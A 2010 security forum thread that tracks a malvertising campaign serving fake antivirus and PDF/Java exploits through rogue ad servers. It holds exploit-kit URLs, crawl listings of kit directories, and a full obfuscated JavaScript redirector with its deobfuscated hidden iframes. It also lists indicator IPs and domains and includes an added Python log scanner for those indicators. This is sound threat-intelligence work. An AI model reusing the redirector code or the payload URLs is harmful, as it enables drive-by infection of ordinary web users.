Malware Domain List
Malware Related => Malicious Domains => Topic started by: eoin.miller on May 11, 2010, 05:00:59 pm
-
Drive by sites serving up FakeAV and exploiting clients through PDF and Java vulnerabilities.
VirusTotal is only picking up 7/41 on the FakeAV currently.
http://www.virustotal.com/analisis/01b398a0ffe71f4d284df532f7d6112c6d4ca40d8ade4d358ba772f1352fc8ff-1273594077
PDF:
http://relwqin.com/b/pdf/all.pdf
Java:
http://relwqin.com/b/java/gsb2.jar
http://relwqin.com/b/java/bof.jar
Driveby URL:
http://relwqin.com/b/index.php?m=jp
-
Entry points to drive by's:
http://alenadi.com/cust.php?n=cust2
http://canteeve.com/cust.php?n=cust2
Almost all the people we have going to these sites are clicking on links from people going to Microsoft live.com mail accounts and other sites using malvertising services like those on live.com.
-
More today:
http://qwebork.com/a/index.php
http://lutypla.com/a/index.php
http://trynger.com/a/index.php
Looks like it is rotating domains daily (not surprising) and the IP is staying the same for now. Still getting linked to by legit sites that have done business with advertising services that, it appears, do not properly vet the organizations they choose to do business with.
-
New entry point:
aledat.com
-
403 http://trynger.com/
200 http://trynger.com/b/
200 http://trynger.com/a/
200 http://trynger.com/e/
200 http://trynger.com/d/
200 http://trynger.com/c/
403 http://trynger.com/cgi-bin/
302 http://trynger.com/config/
200 http://trynger.com/b/index.php
200 http://trynger.com/b/install.php
403 http://trynger.com/b/d/
403 http://trynger.com/b/bin/
403 http://trynger.com/b/include/
403 http://trynger.com/b/java/
403 http://trynger.com/b/pdf/
200 http://trynger.com/b/d/0.php (MD5: eb2add15ac24545e28cbc87dac1a7e65)
200 http://trynger.com/b/d/1.php (MD5: eb2add15ac24545e28cbc87dac1a7e65)
200 http://trynger.com/b/d/2.php (MD5: eb2add15ac24545e28cbc87dac1a7e65)
200 http://trynger.com/b/d/3.php (MD5: eb2add15ac24545e28cbc87dac1a7e65)
200 http://trynger.com/b/d/4.php (MD5: eb2add15ac24545e28cbc87dac1a7e65)
200 http://trynger.com/b/d/5.php (MD5: eb2add15ac24545e28cbc87dac1a7e65)
200 http://trynger.com/b/bin/upload.php
200 http://trynger.com/b/include/config.php
200 http://trynger.com/b/java/bof.jar
200 http://trynger.com/b/java/gsb2.jar
200 http://trynger.com/b/pdf/all.pdf
200 http://trynger.com/b/pdf/pdf.php
200 http://trynger.com/a/index.php
200 http://trynger.com/a/install.php
403 http://trynger.com/a/d/
403 http://trynger.com/a/bin/
403 http://trynger.com/a/include/
403 http://trynger.com/a/java/
403 http://trynger.com/a/pdf/
200 http://trynger.com/a/d/0.php
200 http://trynger.com/a/d/1.php
200 http://trynger.com/a/d/2.php
200 http://trynger.com/a/d/3.php
200 http://trynger.com/a/d/4.php
200 http://trynger.com/a/d/5.php
200 http://trynger.com/a/bin/upload.php
200 http://trynger.com/a/include/config.php
200 http://trynger.com/a/java/bof.jar
200 http://trynger.com/a/java/gsb2.jar
200 http://trynger.com/a/pdf/all.pdf
200 http://trynger.com/a/pdf/pdf.php
200 http://trynger.com/e/index.php
200 http://trynger.com/e/install.php
403 http://trynger.com/e/d/
403 http://trynger.com/e/bin/
403 http://trynger.com/e/include/
403 http://trynger.com/e/java/
403 http://trynger.com/e/pdf/
200 http://trynger.com/e/d/0.php (MD5: d8fc0cbb07ab263198d7a5fbb0ee5c53)
200 http://trynger.com/e/d/1.php (MD5: d8fc0cbb07ab263198d7a5fbb0ee5c53)
200 http://trynger.com/e/d/2.php (MD5: d8fc0cbb07ab263198d7a5fbb0ee5c53)
200 http://trynger.com/e/d/4.php (MD5: d8fc0cbb07ab263198d7a5fbb0ee5c53)
200 http://trynger.com/e/d/5.php (MD5: d8fc0cbb07ab263198d7a5fbb0ee5c53)
200 http://trynger.com/e/d/3.php (MD5: d8fc0cbb07ab263198d7a5fbb0ee5c53)
200 http://trynger.com/e/bin/upload.php
200 http://trynger.com/e/include/config.php
200 http://trynger.com/e/java/bof.jar
200 http://trynger.com/e/java/gsb2.jar
200 http://trynger.com/e/pdf/all.pdf
200 http://trynger.com/e/pdf/pdf.php
200 http://trynger.com/d/index.php
200 http://trynger.com/d/install.php
403 http://trynger.com/d/d/
403 http://trynger.com/d/bin/
403 http://trynger.com/d/include/
403 http://trynger.com/d/java/
403 http://trynger.com/d/pdf/
200 http://trynger.com/d/d/0.php
200 http://trynger.com/d/d/1.php
200 http://trynger.com/d/d/2.php
200 http://trynger.com/d/d/4.php
200 http://trynger.com/d/d/5.php
200 http://trynger.com/d/d/3.php
200 http://trynger.com/d/bin/upload.php
200 http://trynger.com/d/include/config.php
200 http://trynger.com/d/java/bof.jar
200 http://trynger.com/d/java/gsb2.jar
200 http://trynger.com/d/pdf/all.pdf
200 http://trynger.com/d/pdf/pdf.php
200 http://trynger.com/c/index.php
200 http://trynger.com/c/install.php
403 http://trynger.com/c/d/
403 http://trynger.com/c/bin/
403 http://trynger.com/c/include/
403 http://trynger.com/c/java/
403 http://trynger.com/c/pdf/
200 http://trynger.com/c/d/0.php
200 http://trynger.com/c/d/1.php
200 http://trynger.com/c/d/3.php
200 http://trynger.com/c/d/2.php
200 http://trynger.com/c/d/4.php
200 http://trynger.com/c/d/5.php
200 http://trynger.com/c/bin/upload.php
200 http://trynger.com/c/include/config.php
200 http://trynger.com/c/java/bof.jar
200 http://trynger.com/c/java/gsb2.jar
200 http://trynger.com/c/pdf/all.pdf
200 http://trynger.com/c/pdf/pdf.php
200 http://aledat.com/
200 http://aledat.com/cust.php
200 http://aledat.com/index.php
200 http://aledat.com/phpinfo.php
403 http://aledat.com/b/
403 http://aledat.com/w/
403 http://aledat.com/ad/
403 http://aledat.com/cgi-bin/
403 http://aledat.com/ad/js/
edit: forgot the other one :D
-
Found the advertising server that is redirecting to the intermediary and eventually the exploit sites:
adnet.media.roxantb.com
That domain was registered last month and serves up packed/obfuscated javascript:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 3M={5f:q(m,e,n){m=12.3F(m);5 R=[],M=\'\';x(5 i=0;i<m.j;i+=3){5 11=\'1\';x(5 h=0;h<3;h++){v(i+h<m.j){N=8.o(m.f(i+h))-30;v(N.j<2)N=\'0\'+N}3K 5a;11+=N}R.2t(11+\'1\')}x(5 k=0;k<R.j;k++){5 P=8.13(R[k],e,n);5 L=P.X(16);V(L.j<7)L=\'0\'+L;M+=L}M=M.3R(3P 3O(\'^+|+$\',\'g\'),\'\');b 8.2r(M)},3N:q(c,d,n){c=8.2p(c);5 G=[],U=\'\',18=\'\';x(5 i=0;i<c.j;i+=7)G.2t(c.Y(i,7));x(5 u=0;u<G.j;u++)v(G[u]==\'\')G.5b(u,1);x(5 u=0;u<G.j;u++){5 P=8.13(Z(G[u],16),d,n)+\'\';U+=P.Y(1,P.j-2)}x(5 u=0;u<U.j;u+=2)18+=8.a(Z(U.Y(u,2),10)+30);b 12.3Q(18)},o:q(a){b t.o(a)},a:q(2u){b t.a(2u)},17:q(g,l){b g-(l*58.59(g/l))},13:q(2s,14,19){5 W=1,i=0,O=2s;V((14>>i)>0){v(((14>>i)&1)==1)W=8.17((W*O),19);O=8.17((O*O),19);i++}b W},2r:q(B){b B;5 J=\'\';x(5 i=0,Q=B.j;i<Q;i+=2){5 I=Z(\'\'+B.f(i)+B.f(i+1),16).X(10);J+=t.a(I)}b J},2p:q(B){b B;5 J=\'\';x(5 i=0,Q=B.j;i<Q;i++){5 I=t.o(B.f(i)).X(16);J+=I.j==2?I:\'0\'+I}b J}};5 
t={F:{3J:{2v:2q,2B:2w,2z:2A,2y:2x,2n:2o,2e:2d,2b:2c,2a:29,2g:2f,2m:2l,2j:2k,2i:2h,2D:2C,2Y:2X,28:2W,2U:2T,31:2Z,35:36,32:34,2S:33,2I:2R,2H:2J,2E:2G,2K:2F,2Q:2L,2O:2P,2N:2M,1M:37,1r:1p,1t:1u,1q:1x,1w:1v,1C:1B,1z:1A,1y:1o,1m:1D,1f:1d,1a:1c,1e:1b,1l:1n,1k:1g,1h:1j,1s:1i,1Y:27,1X:1Z,1U:1W,20:1V,26:21,24:25,1E:22,1T:23,1J:1S,1I:1K,1F:1H,1L:1G,1Q:1R,1N:1P,2V:1O,4v:3c,38:4r,4u:4t,4p:4s,4w:4q,4A:4B,4y:4z,4n:4o,4e:4d,4b:4c,4a:49,4g:4f,4m:4l,4D:4k,4h:4j,4C:4i,4Y:4H,4X:4Z,4U:4W,51:4V,52:55,53:56,50:54,4I:4S,4T:4J,4E:4G,4K:4F,4Q:4L,4P:4R,4M:4O,4x:4N,3t:47,3s:3u,3p:3r,3v:3q,3B:3w,3z:3A,3y:3x,3n:3o,3e:3d,3b:48,3a:39,3g:3f,3m:3l,3j:3k,3i:3h,3D:3C,3Z:3Y,3W:3X,3V:3U,41:40,45:46,42:44,3T:43,3I:3S},3H:{2q:2v,2w:2B,2A:2z,2x:2y,2o:2n,2d:2e,2c:2b,29:2a,2f:2g,2l:2m,2k:2j,2h:2i,2C:2D,2X:2Y,2W:28,2T:2U,2Z:31,36:35,34:32,33:2S,2R:2I,2J:2H,2G:2E,2F:2K,2L:2Q,2P:2O,2M:2N,37:1M,1p:1r,1u:1t,1x:1q,1v:1w,1B:1C,1A:1z,1o:1y,1D:1m,1d:1f,1c:1a,1b:1e,1n:1l,1g:1k,1j:1h,1i:1s,27:1Y,1Z:1X,1W:1U,1V:20,21:26,25:24,22:1E,23:1T,1S:1J,1K:1I,1H:1F,1G:1L,1R:1Q,1P:1N,1O:2V,3c:4v,4r:38,4t:4u,4s:4p,4q:4w,4B:4A,4z:4y,4o:4n,4d:4e,4c:4b,49:4a,4f:4g,4l:4m,4k:4D,4j:4h,4i:4C,4H:4Y,4Z:4X,4W:4U,4V:51,55:52,56:53,54:50,4S:4I,4J:4T,4G:4E,4F:4K,4L:4Q,4R:4P,4O:4M,4N:4x,47:3t,3u:3s,3r:3p,3q:3v,3w:3B,3A:3z,3x:3y,3o:3n,3d:3e,48:3b,39:3a,3f:3g,3l:3m,3k:3j,3h:3i,3C:3D,3Y:3Z,3X:3W,3U:3V,40:41,46:45,44:42,43:3T,3S:3I}},o:q(a,r){r=r||\'3J\';v(!8.F[r])b 3G;a=a.5g(0);b(a 3E 8.F[r])?8.F[r][a]:a},a:q(o,r){r=r||\'3H\';v(!8.F[r])b 3G;o=(o 3E 8.F[r])?8.F[r][o]:o;b 5m.5h(o)}};5 12={w:"5l+/=",3F:q(p){5 s=\'\',H,C,D,K,E,z,y,i=0;V(i<p.j){H=t.o(p.f(i++));C=t.o(p.f(i++));D=t.o(p.f(i++));K=H>>2;E=((H&3)<<4)|(C>>4);z=((C&15)<<2)|(D>>6);y=D&5i;v(3L(C))z=y=S;3K v(3L(D))y=S;s=s+8.w.f(K)+8.w.f(E)+8.w.f(z)+8.w.f(y)}b s},3Q:q(p){5 s=\'\',H,C,D,K,E,z,y,i=0;p=p.3R(3P 
3O(\'[^A-5j-5e-9+/=]\',\'g\'),\'\');V(i<p.j){K=8.w.T(p.f(i++));E=8.w.T(p.f(i++));z=8.w.T(p.f(i++));y=8.w.T(p.f(i++));H=(K<<2)|(E>>4);C=((E&15)<<4)|(z>>2);D=((z&3)<<6)|y;s=s+t.a(H);v(z!=S)s=s+t.a(C);v(y!=S)s=s+t.a(D)}b s}};5d(3M.3N(\'57\',\'5c\',\'5k\'));',62,333,'|||||var|||this||chr|return||||charAt||||length|||||ord|input|function|dir|output|ASCII||if|alphabet|for|enc4|enc3||str|chr2|chr3|enc2|translations|decryptarray|chr1|bte|result|enc1|chunk|coded|tmpstr|basepow2|resultmod|len|asci|64|indexOf|deencrypt|while|accum|toString|substr|parseInt||tmpasci|BASE64|powmod|exp|||mod|resultd|modulus|1028|175|170|168|1031|1025|179|1169|184|180|1110|1030|1168|178|163|156|1115|1114|1105|1116|157|159|1119|158|1032|1118|162|161|1038|165|1040|1044|197|196|1043|1042|195|1045|8250|1047|200|199|1046|198|194|1041|1112|189|188|1108|8470|186|1029|190|192|193|1111|191|1109|185|1035|135|8225|8224|134|133|8230|136|8364|139|8249|1033|138|137|8240|8222|132|strhex|128|hexstr|base|push|num|1026|129|131|1107|8218|130|1027|140|1034|8211|151|150|8226|8221|149|8212|152|154|1113|8482|153|65533|148|8220|143|1039|1048|142|141|1036|144||1106|8217|147|146|8216|145|155|1050|242|1090|1089|201|240|1088|243|1091|246|1094|1093|245|244|1092|1087|239|1082|235|234|1081|1080|233|1083|236|238|1086|1085|237|1084|247|1095|in|encode|null|php2js|1103|js2php|else|isNaN|RSA|decrypt|RegExp|new|decode|replace|255|1102|250|1098|1097|249|248|1096|251|1099|1101|254|253|1100|252|232|241|211|1059|1058|210|209|1057|212|1060|1063|216|215|214|213|1061|1056|208|1052|205|202|204|203|1051|1049|1053|1079|1055|207|1054|206|1064|1062|1074|227|226|217|1072|225|1075|228|1078|231|230|1077|1076|229|224|1073|1067|220|219|1066|1065|218|1071|1068|1069|1070|223|221|222|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|Math|floor|break|splice|3451759|eval|z0|encrypt|charCodeAt|fromCharCode|63|Za|60670333|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|String'.split('|'),0,{}))
Deobfuscated:
<iframe src="http://aledat.com/cust.php?n=cust2" style="visibility: hidden;" height="1" width="1"></iframe>
<iframe class=" izvpldobgmpcxynswtnf" src="http://adnet.media.roxantb.com/stats_js_e.php?id=22214735" style="visibility: hidden;" height="1" width="1"></iframe>
<a href="http://curves.com/?=34547" target="_blank">
<img class=" izvpldobgmpcxynswtnf" src="http://adnet.media.roxantb.com/banners/load.php?id=22214735" border="0"></a>
In this instance, the aledat.com/cust.php?n=cust2 request redirects to another site that actually has the driveby kit on it.
-
What exactly is the url of obfuscated code ?
-
There is also another domain name on this IP, I should be able to churn up some more domains now.
adnet.media.plebert.com
-
What exactly is the url of obfuscated code ?
here is an example one:
http://adnet.media.roxantb.com/bn/j/cd/?rq=104192&sid=22214735&m=514&tn=7&d=s&ct=1&t=s
-
Malvertising hostnames:
adnet.media.roxantb.com
adnet.media.plebert.com
adnet.media.ditent.com
adnet.media.modicea.com
IP addresses:
188.72.192.52
188.72.192.67
188.72.192.221
-
Sooooo, yea, there is tons of badness going on in here. Basically, all traffic to the 188.72.192.0/24 should be considered suspect.
Hostnames within the 188.72.192.0/24 we have seen traffic to/from in the last month or so:
ad.doubleclick.net.spellet.com
adfarm.mediaplex.com.rulash.com
adnet.media.ditent.com
adnet.media.modicea.com
adnet.media.plebert.com
adnet.media.roxantb.com
aledat.com
alenadi.com
canteeve.com
media.fastclick.net.attesca.com
mediastatsfx.com
sefito.com
stathyte.com
view.atdmt.com.dilann.com
view.atdmt.com.intati.com
www.downloads.ws - Probably not a malware site...
Looks like they enjoy keeping the real domain names of advertising servers as a prefix to their own.
-
Almost all the people we have going to these sites are clicking on links from people going to Microsoft live.com mail accounts and other sites using malvertising services like those on live.com.
Hi do you have more information about that? Does it happen on blogs, hotmail ... ? If it comes through MS advertising I can get those pulled but I need more information where the redirects occur if possible.
Looks like they enjoy keeping the real domain names of advertising servers as a prefix to their own.
Yes, that's going on for a while already.
-
Almost all the people we have going to these sites are clicking on links from people going to Microsoft live.com mail accounts and other sites using malvertising services like those on live.com.
Hi do you have more information about that? Does it happen on blogs, hotmail ... ? If it comes through MS advertising I can get those pulled but I need more information where the redirects occur if possible.
Most of the time it is when people login to the live.com mail account, the banner ad has the packed/obfuscated javascript that is served up by one of the following domains:
ad.doubleclick.net.spellet.com
adfarm.mediaplex.com.rulash.com
adnet.media.ditent.com
adnet.media.modicea.com
adnet.media.plebert.com
adnet.media.roxantb.com
media.fastclick.net.attesca.com
view.atdmt.com.dilann.com
view.atdmt.com.intati.com
Then that JavaScript from the above list of sites includes an iframe that loads content from the following domains:
aledat.com/?cust=2
alenadi.com/?cust=2
canteeve.com/?cust=2
sefito.com/?cust=2
stathyte.com/?cust=2
Then the content loaded from those sites causes the actual drive by's to be loaded from the following sites which all resolve to 194.8.250.60/194.8.250.61:
polkita.com
www.lutypla.com
zarenaga.com
turkinke.com
relwqin.com
trynger.com
qwebork.com
Looks like they enjoy keeping the real domain names of advertising servers as a prefix to their own.
Yes, that's going on for a while already.
-
Forgot to add that anything within the 194.8.250.0/24 should also be considered suspect.
194.8.250.0/24 - Hosts the drive by's, exploits and malware.
188.72.192.0/24 - Hosts the Malicious advertising services redirecting to the drive by, exploit and malware.
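As an added example (not code from this thread or from any of its posters), here are the two indicators described above turned into a check that runs over proxy log lines: the "legitimate ad-server hostname used as a prefix of their own domain" trick, and traffic to the two suspect netblocks. The log line format (timestamp, client IP, destination IP, method, URL) is an assumption made for the demo; the netblocks and hostnames come from the thread, while the client and "clean" destination addresses are placeholders from 10.0.0.0/8 and 203.0.113.0/24.

```python
"""Two checks from the thread, run over constructed proxy log lines.

Added example, not code from the original thread. The log line format
(timestamp client_ip dest_ip method url, space separated) is an assumption
made for this demo; the netblocks and hostnames come from the thread, and the
client / "clean" destination addresses are placeholders from 10.0.0.0/8 and
203.0.113.0/24 (TEST-NET-3).
"""
import ipaddress
from dataclasses import dataclass
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

# 188.72.192.0/24 hosts the malicious ad redirectors, 194.8.250.0/24 the drive-bys.
SUSPECT_NETS = [ipaddress.ip_network(n) for n in ("188.72.192.0/24", "194.8.250.0/24")]

# Legitimate ad-server hostnames the campaign reuses as the *prefix* of its own names.
KNOWN_AD_HOSTS = (
    "ad.doubleclick.net",
    "adfarm.mediaplex.com",
    "media.fastclick.net",
    "view.atdmt.com",
)


def registrable_domain(host: str) -> str:
    """Last two labels of a hostname. Good enough for .com/.net; a production
    version should use the public suffix list so co.uk style domains work."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def lookalike_prefix(host: str) -> Optional[str]:
    """Return the legitimate ad hostname that `host` impersonates, if any.

    ad.doubleclick.net.spellet.com starts with 'ad.doubleclick.net.' but its
    registrable domain is spellet.com, so it is flagged; ad.doubleclick.net
    itself is not.
    """
    host = host.lower().rstrip(".")
    for legit in KNOWN_AD_HOSTS:
        if host.startswith(legit + ".") and registrable_domain(host) != registrable_domain(legit):
            return legit
    return None


def in_suspect_net(ip: str) -> bool:
    """True when the destination address falls in one of the thread's netblocks."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in SUSPECT_NETS)


@dataclass
class Finding:
    line_no: int
    host: str
    dest_ip: str
    reasons: Tuple[str, ...]


def scan_log(lines: List[str]) -> List[Finding]:
    """Flag every line that hits either indicator; malformed lines are skipped."""
    findings = []
    for no, line in enumerate(lines, 1):
        fields = line.split()
        if len(fields) != 5:
            continue
        _ts, _client, dest_ip, _method, url = fields
        host = urlsplit(url).hostname or ""
        reasons = []
        legit = lookalike_prefix(host)
        if legit:
            reasons.append(f"lookalike of {legit}")
        if in_suspect_net(dest_ip):
            reasons.append("dest in suspect netblock")
        if reasons:
            findings.append(Finding(no, host, dest_ip, tuple(reasons)))
    return findings


# Constructed sample: the chain from the thread (webmail -> fake ad host -> cust.php -> exploit kit)
# plus one benign request to the real ad.doubleclick.net.
SAMPLE_LOG = [
    "2010-05-11T16:01:02Z 10.0.0.5 203.0.113.10 GET http://mail.live.com/",
    "2010-05-11T16:01:03Z 10.0.0.5 188.72.192.52 GET http://ad.doubleclick.net.spellet.com/bn/j/cd/?rq=1",
    "2010-05-11T16:01:04Z 10.0.0.5 188.72.192.67 GET http://aledat.com/cust.php?n=cust2",
    "2010-05-11T16:01:05Z 10.0.0.5 194.8.250.60 GET http://trynger.com/b/index.php?m=jp",
    "2010-05-11T16:01:06Z 10.0.0.6 203.0.113.20 GET http://ad.doubleclick.net/adj/site",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.host} -> {f.dest_ip}: {', '.join(f.reasons)}")
```

The prefix check only catches names built on the hostnames in KNOWN_AD_HOSTS; the adnet.media.* family in the thread shares no legitimate prefix and is caught here only through its netblock, which is why the two checks are combined.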
-
Domains we have seen using these advertising services; the most common referrers have been mail.live.com servers once users have logged in to check their mail.
ad.doubleclick.net
adnet.media.ditent.com
ad.yieldmanager.com
anet.tradedoubler.com
apps.detnews.com
b5.boards2go.com
beforeitsnews.com
blogs.citizen-times.com
blogs.desmoinesregister.com
bobshouseofvideogames.com
caloriecount.about.com
classifieds.gftribune.com
comics.com
courier-journal.weather.gannettonline.com
cvhs.adbureau.net
dailyfreeman.ca.kaango.com
dailylocal.com
dailysquee.com
data.tennessean.com
delcotimes.com
detnews.com
forums.televisionwithoutpity.com
googleads.g.doubleclick.net
hawaiipreps.honoluluadvertiser.com
hfboards.com
ihasahotdog.com
lumberjocks.com
macombdaily.com
mainlinemedianews.com
mediatakeout.com
middletownpress.com
moneycentral.msn.com
movies.msn.com
msn.foxsports.com
mylifeisaverage.com
nashvillecitypaper.com
nbcsports.msnbc.com
nhregister.com
obituaries.citizen-times.com
ouinsider.com
oxygen.com
photos.indystar.com
php.app.com
pioneer.olivesoftware.com
pqasb.pqarchiver.com
pubads.g.doubleclick.net
ratemyprofessors.com
saratogian.com
sec.todaysthv.com
svc1.m5prod.net
tag.admeld.com
thedailywh.at
the.honoluluadvertiser.com
topix.cachefly.net
trentonian.com
troyrecord.com
tv.msn.com
webmail.peoplepc.com
www.13wmaz.com
www.49erswebzone.com
www.9news.com
www.apartments.com
www.app.com
www.argusleader.com
www.azcentral.com
www.barnesandnoble.com
www.baxterbulletin.com
www.bigeasyclassifieds.com
www.calgarysun.com
www.captivate.com
www.cars.com
www.casttv.com
www.charter.net
www.chillicothegazette.com
www.citizen-times.com
www.clarionledger.com
www.cnweekly.com
www.coshoctontribune.com
www.courier-journal.com
www.courierpostonline.com
www.crimsonconfidential.com
www.dailyfreeman.com
www.dailylocal.com
www.dailyrecord.com
www.dailyworld.com
www.darkroastedblend.com
www.delawareonline.com
www.delcotimes.com
www.delmarvanow.com
www.democratandchronicle.com
www.desmoinesregister.com
www.excite.com
www.federaltimes.com
www.fishexplorer.com
www.floridatoday.com
www.fox5vegas.com
www.freep.com
www.greatfallstribune.com
www.greenandwhite.com
www.greenbaypressgazette.com
www.guampdn.com
www.hawaiinavynews.com
www.heritage.com
www.heritagenews.com
www.honoluluadvertiser.com
www.huffingtonpost.com
www.india-forums.com
www.lansingstatejournal.com
www.legacy.com
www.lohud.com
www.macombdaily.com
www.mainlinemedianews.com
www.mentalfloss.com
www.middletownpress.com
www.montgomeryadvertiser.com
www.morningjournal.com
www.mycentraljersey.com
www.nashuatelegraph.com
www.neogaf.com
www.news-herald.com
www.newsleader.com
www.news-press.com
www.nextdaypets.com
www.nhregister.com
www.oneidadispatch.com
www.overclockersclub.com
www.portclintonnewsherald.com
www.pottsmerc.com
www.pottstownmercury.com
www.press-citizen.com
www.pressconnects.com
www.prosportsdaily.com
www.racingjunk.com
www.rawstory.com
www.registercitizen.com
www.rgj.com
www.saratogian.com
www.speedwaymedia.com
www.stevenspointjournal.com
www.tallahassee.com
www.televisionwithoutpity.com
www.tennessean.com
www.tetongravity.com
www.theadvertiser.com
www.thecalifornian.com
www.theithacajournal.com
www.themorningsun.com
www.thenewsstar.com
www.thereporteronline.com
www.thespectrum.com
www.thetimesherald.com
www.timesherald.com
www.tmnews.com
www.tomshardware.com
www.trentonian.com
www.troyrecord.com
www.universalsports.com
www.usanetwork.com
www.visaliatimesdelta.com
www.wausaudailyherald.com
www.wbir.com
www.wisconsinrapidstribune.com
www.worldtimeserver.com
www.wtsp.com
www.wusa9.com
www.zanesvilletimesrecorder.com
-
This has been tossed over to US-CERT, dsheild/SANS and MS. Hopefully these guys can get rooted out of the affiliate networks quickly.
-
Someone sent us this url by contact form.
http://adnet.media.unwited.com/cr/j/cd/?rt=47210&sid=2421828&m=5171&ts=31&d=x&ctc=31&tm=sc
url format looks exactly like the one from adnet.media.roxantb.com. I don't see any redirection to malwareurl.
Obfuscated code contains a link to bestwestern.com.
-
also reported today
adnet.media.prananc.com/b/jx/cd/?rq=103193&sid=215411720&m=714&tn=4&d=s&ct=1&t=s
adnet.media.ditent.com/bn/j/cd/?rq=104192&sid=9472394&m=514&tn=7&d=s&ct=1&t=s
-
Someone sent us this url by contact form.
http://adnet.media.unwited.com/cr/j/cd/?rt=47210&sid=2421828&m=5171&ts=31&d=x&ctc=31&tm=sc
url format looks exactly like the one from adnet.media.roxantb.com. I don't see any redirection to malwareurl.
Obfuscated code contains a link to bestwestern.com.
Domain is definitely malicious and actively being seen on our network. I've seen it not include the malicious URLs sometimes, not sure why really. Obfuscated JavaScript leads the client to the following exploit kit URLs in order in the sample we have looked at:
http://phicruss.com/cust.php?n=cust2
http://bbnhs.com/c/index.php
JS Unpack Report for URL http://adnet.media.unwited.com/cr/j/cd/?rt=47210&sid=2421828&m=5171&ts=31&d=x&ctc=31&tm=sc:
http://jsunpack.jeek.org/dec/go?report=b39fc1948d85cbd5b96bee1ee078ea2b432bbe59
They flipped to the 178.162.133.0/24 netblock on 5-14-10 @15:00 UTC. Luckily this is only for the advertising server hosting the javascript that is redirecting. The domains still being served up currently go to the other previously mentioned netblocks (188.72.192.0/24, 194.8.250.0/24). Most advertising now seems to be referred by Yahoo! web mail services. hooray.
-
This has been tossed over to US-CERT, dsheild/SANS and MS. Hopefully these guys can get rooted out of the affiliate networks quickly.
Correction: US-CERT & SANS and Dshield. MS still has nothing and they are the only ones who can do something about it.
Most advertising now seems to be referred by Yahoo! web mail services. hooray
Yeah, so what about those victims? Got any PCAP's of going through Yahoo as I have contacts in every advertising network and that way faster than SANS (it's not even their business).
Imagine how many more people have been infected because you send stuff to the wrong people ?
-
This has been tossed over to US-CERT, dsheild/SANS and MS. Hopefully these guys can get rooted out of the affiliate networks quickly.
Correction: US-CERT & SANS and Dshield. MS still has nothing and they are the only ones who can do something about it.
Most advertising now seems to be referred by Yahoo! web mail services. hooray
Yeah, so what about those victims? Got any PCAP's of going through Yahoo as I have contacts in every advertising network and that way faster than SANS (it's not even their business).
Imagine how many more people have been infected because you send stuff to the wrong people ?
The handlers at these various organizations told me they are disseminating the information appropriately to the correct places. If you wish to furnish me with direct contacts at any of these organizations, I will talk to them directly about it and provide any information I have to help stop it. I do not send out PCAP's of my clients data to unknown sources via web forums, even after I have taken the time to sanitize them. This isn't my first rodeo.
And FYI, SANS is part of the co-op that is DShield.
http://www.dshield.org/
http://isc.sans.org/
Look similar?
-
FYI, this is still running pretty rampant, watching people get referred from sites like open.ad.yieldmanager.net:
HTTP/1.1 200 OK
Date: Mon, 24 May 2010 14:43:12 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV T
AI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI
PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Connection: close
Transfer-Encoding: chunked
Content-Type: application/x-multiad-json; charset=UTF-8
Content-Length: 10536
(function(){
var multiAdPack = {
"encoding":"UTF-8",
"version":"1.1",
"reqtype":"ac",
"ads":[
{"ad":"<!-- SpaceID=2022775850 loc=AP37 noad -->\u000a<img style=\"display:none\"
width=0 height=0 alt=\"\" src=\"http://us.bc.yahoo.com/b?P=ae0af71a-6742-11df-bf
5f-bf408f606688&T=19d2poc7s%2fX%3d1274712193%2fE%3d2022775850%2fR%3dncnws%2fK%3d5
%2fV%3d8.1%2fW%3d0%2fY%3dPARTNER_US%2fF%3d2921782211%2fH%3dYWx0c3BpZD0iOTY3MjgzMT
UxIiBzZXJ2ZUlkPSJhZTBhZjcxYS02NzQyLTExZGYtYmY1Zi1iZjQwOGY2MDY2ODgiIHNpdGVJZD0iODI
4NTUxIiB0U3RtcD0iMTI3NDcxMjE5Mjk4NTUwMiIgdGFyZ2V0PSJfYmxhbmsiIA--%2fQ%3d-1%2fS%3d
1%2fJ%3d29558862&U=128h7uej0%2fN%3djLRSIkwNiZE-%2fC%3d-1%2fD%3dAP37%2fB%3d-1%2fV%
3d5\"><script>// no ads\u000a</script><!--flv has invalid value--><!--rTg has inv
alid value--><!--rTg has invalid value--><!--XCH|ae0af71a-6742-11df-bf5f-bf408f60
6688--><!--fac9.cl1.ads.adx.ac4.yahoo.com-->",
"type":"text/html",
"id":"0",
"size":["160x90"],
"slug":false,
"secure":false},
{"ad":"<script language=\"javascript\" src=\"hXXp://adnet.media.unwited.com/cr/j/
cd/?rt=47210&sid=2421828&m=5171&ts=31&d=x&ctc=31&tm=sc\">\u000d\u000d</script>\u0
00d\u000d<noscript>\u000d\u000d<a href=\"http://us.ard.yahoo.com/SIG=15vmvpbvl/M=
600742873.600772841.409311541.408347572/D=ncnws/S=2022775850:N/Y=PARTNER_US/L=ae0
af71a-6742-11df-bf5f-bf408f606688/B=j7RSIkwNiZE-/J=1274712193000950/K=33yOa_MgRUm
ArzkSIRRKYQ/EXP=1274719393/A=1757979682871089560/R=0/X=2/SIG=12t964gb2/*http://ad
net.media.unwited.com/cr/j/clk/?rt=47210&sid=2421828&m=5171&ts=31&d=x&ctc=31&tm=s
c\" target=\"_top\">\u000d\u000d<img src=\"http://adnet.media.unwited.com/cr/j/vi
ew/?rt=47210&sid=2421828&m=5171&ts=31&d=x&ctc=31&tm=sc\" width=728 height=90 bord
er=0>\u000d\u000d</a>\u000d\u000d</noscript><img style=\"display:none\" width=0 h
